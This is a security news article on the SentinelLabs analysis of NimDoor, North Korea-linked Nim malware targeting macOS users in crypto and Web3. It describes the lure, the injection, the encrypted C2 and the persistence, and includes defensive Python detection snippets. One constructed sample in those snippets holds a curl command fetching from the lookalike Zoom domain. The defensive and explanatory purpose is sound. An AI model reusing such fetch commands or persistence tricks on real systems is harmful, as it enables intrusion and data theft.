Nim Malware Hits macOS Users in Web3, Crypto Sectors

North Korean Hackers Deploy Rare Nim-Based Malware on macOS to Target Web3 Startups

A new Nim-based malware campaign targets macOS users in crypto and Web3 firms, using novel persistence tricks and encrypted communication.

Written by
Aminu Abdullahi
Jul 7, 2025

Security researchers at SentinelLabs have uncovered a malware campaign targeting macOS users, particularly those in the cryptocurrency and Web3 sectors. The malware, dubbed “NimDoor,” is linked to North Korean hackers and employs a mix of AppleScript, C++, and Nim-based payloads to infiltrate systems, steal sensitive data, and maintain persistence.

While North Korea’s cyber units often rely on social engineering tactics and phishing schemes, NimDoor introduces unusually advanced techniques that distinguish it from prior macOS threats.

Researchers Phil Stokes and Raffaele Sabato at SentinelLabs said in their joint report, “Unusually for macOS malware, the threat actors employ a process injection technique and remote communications via wss, the TLS-encrypted version of the WebSocket protocol.” This combination of old-school social tactics and rare malware tooling sets NimDoor apart from previous macOS threats.

How the attack works

The attack chain begins with social engineering: the victim is approached on Telegram by someone posing as a familiar contact. The attackers persuade the target to schedule a meeting via Calendly, then send an email containing a link to a bogus “Zoom SDK update script.”

When the recipient clicks the link, it downloads an AppleScript file called zoom_sdk_support.scpt, deliberately padded with 10,000 lines of blank space to obscure its real purpose. Hidden within are only three malicious lines of code, which contact a fake domain (support.us05web-zoom[.]forum) designed to resemble Zoom’s real URL. That domain serves a second-stage script, which in turn kicks off the real attack.
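A triage check for the two tricks described above (blank-line padding and a lookalike Zoom domain), added here as an illustration rather than code from the SentinelLabs report; the sample script text is constructed, and the padding thresholds are assumptions:

```python
import re
from dataclasses import dataclass

# Heuristic thresholds (assumptions, not from the report): thousands of blank
# lines around only a handful of content lines is treated as padding.
BLANK_PAD_THRESHOLD = 1000
MAX_CONTENT_LINES = 10
LEGIT_ZOOM_DOMAINS = ("zoom.us", "zoom.com")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

@dataclass
class ScriptTriage:
    blank_lines: int
    content_lines: int
    domains: list
    padded: bool
    lookalike_domains: list

def refang(text: str) -> str:
    # Undo common defanging ("[.]", "hxxp") so hosts can be extracted.
    return text.replace("[.]", ".").replace("hxxp", "http")

def is_zoom_lookalike(host: str) -> bool:
    # True for hosts that contain "zoom" but are not under Zoom's real domains.
    h = host.lower()
    if "zoom" not in h:
        return False
    return not any(h == d or h.endswith("." + d) for d in LEGIT_ZOOM_DOMAINS)

def triage_applescript(source: str) -> ScriptTriage:
    lines = source.splitlines()
    content = [ln for ln in lines if ln.strip()]
    blank = len(lines) - len(content)
    hosts = sorted({m.group(1) for m in URL_HOST_RE.finditer(refang(source))})
    return ScriptTriage(
        blank_lines=blank,
        content_lines=len(content),
        domains=hosts,
        padded=blank >= BLANK_PAD_THRESHOLD and len(content) <= MAX_CONTENT_LINES,
        lookalike_domains=[h for h in hosts if is_zoom_lookalike(h)],
    )

# Constructed sample mimicking the padded dropper: 2000 blank lines, then
# three content lines referencing the defanged domain named in the article.
SAMPLE_SCPT = "\n" * 2000 + (
    "-- Zoom SDK update\n"
    'set u to "https://support.us05web-zoom[.]forum/update"\n'
    'do shell script "curl -s " & u\n'
)
```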

After initial contact, the malware deposits two files into the system’s temporary directory: a Mach-O executable labeled “a” and a file called “installer.” Together, the two components carry out a coordinated attack sequence.

The “a” binary, a Mach-O executable written in C++, drops a payload named netchk, and then retrieves two Bash scripts tasked with collecting data, such as browser histories, system information, and Telegram message archives.

The second file, “installer,” written in Nim, is designed to establish persistence on the infected machine. It deploys two additional Nim-based binaries titled GoogIe LLC (using a capital “i” to mimic a lowercase “L”) and CoreKitAgent. These binaries handle persistent access and ensure data continues to be siphoned from the machine long after the initial compromise.

Process injection and wss connections: Rare for macOS

What makes NimDoor especially dangerous is its use of process injection and encrypted communication via the wss:// protocol, both techniques rarely seen in macOS malware.

The “a” binary decrypts an embedded file named trojan1_arm64 and injects it into a decoy process. That injected code then establishes a secure connection with a command-and-control server hosted at wss://firstfromsep[.]online/client.

The malware’s communication system uses custom JSON messages with multiple layers of encryption, including RC4 and base64, allowing the attackers to run commands like fetching system details, changing directories, or executing shell commands.

SentinelLabs noted, “The malware uses multiple levels of RC4 encryption in combination with the base64 encoding and three different keys before the communication.”

One particularly notable discovery is how CoreKitAgent maintains persistence. This binary monitors for termination signals such as SIGINT or SIGTERM, which typically occur when users attempt to force-quit a process.

Instead of stopping, the malware reacts to these signals by reinstalling itself, setting up LaunchAgents, and restoring the core payloads. This ensures the malware survives even if a user attempts to stop it manually.
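A LaunchAgent audit that looks for the lookalike naming described above (a capital “I” standing in for a lowercase “l”) and for agents configured to run from unusual locations or to be restarted by launchd, added here as an example and not code from the SentinelLabs report; the plist sample is constructed, and the suspicious-directory list and the RunAtLoad/KeepAlive heuristic are assumptions rather than documented NimDoor behaviour:

```python
import glob
import os
import plistlib
import re

# Capital I or digit 1 wedged between lowercase letters, as in "GoogIe" for "Google".
HOMOGLYPH_RE = re.compile(r"[a-z][I1][a-z]")
# Locations a legitimate vendor agent would not normally run from (assumption).
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

def label_findings(label: str) -> list:
    findings = []
    if HOMOGLYPH_RE.search(label):
        findings.append("label has capital I / digit 1 posing as lowercase l")
    if any(ord(c) > 127 for c in label):
        findings.append("label contains non-ASCII characters")
    return findings

def audit_launch_agent(plist_bytes: bytes) -> dict:
    # Parse one LaunchAgent plist and return heuristic findings.
    p = plistlib.loads(plist_bytes)
    label = p.get("Label", "")
    args = p.get("ProgramArguments") or ([p["Program"]] if "Program" in p else [])
    exe = args[0] if args else ""
    findings = label_findings(label)
    if any(exe.startswith(d) for d in SUSPICIOUS_DIRS):
        findings.append(f"program runs from a temp/shared directory: {exe}")
    if p.get("RunAtLoad") and p.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: launchd restarts it when killed")
    return {"label": label, "program": exe, "findings": findings}

def audit_user_agents(directory: str = "~/Library/LaunchAgents") -> list:
    # Audit every plist in a LaunchAgents folder; returns only flagged entries.
    results = []
    for path in glob.glob(os.path.join(os.path.expanduser(directory), "*.plist")):
        with open(path, "rb") as fh:
            report = audit_launch_agent(fh.read())
        if report["findings"]:
            results.append({"path": path, **report})
    return results

# Constructed sample of a lookalike agent (label and path are made up).
BAD_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>GoogIe LLC</string>
<key>ProgramArguments</key><array><string>/Users/Shared/GoogIe LLC</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""
```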

Why Nim? A language that hides in plain sight

North Korean hackers have used niche programming languages like Go and Rust before, but Nim brings new stealth advantages. Because Nim can run functions at compile time and intermix that code with runtime code, it makes it harder for analysts to separate malicious logic from normal operations.

“Nim’s rather unique ability to execute functions during compile time allows attackers to blend complex behaviour into a binary with less obvious control flow,” wrote SentinelLabs researchers.

This campaign shows a mix of old tricks, like phishing, and new techniques designed specifically for macOS environments, which are often assumed to be more secure.

SentinelLabs encourages “other analysts, researchers, and detection engineers to invest effort in understanding these lesser-known languages and how they will eventually be leveraged.”

Aminu Abdullahi

Aminu Abdullahi is a B2C and B2B technology and finance writer with more than six years of experience covering enterprise IT, cybersecurity, cloud computing, artificial intelligence, fintech, business software, and emerging technologies. His work has appeared in publications including TechRepublic, eWEEK, Channel Insider, Geekflare, Enterprise Networking Planet, eSecurity Planet, CIO Insight, and Webopedia. With a technical background in computer science, he specializes in translating complex technology topics into clear, accessible content for business leaders and decision-makers.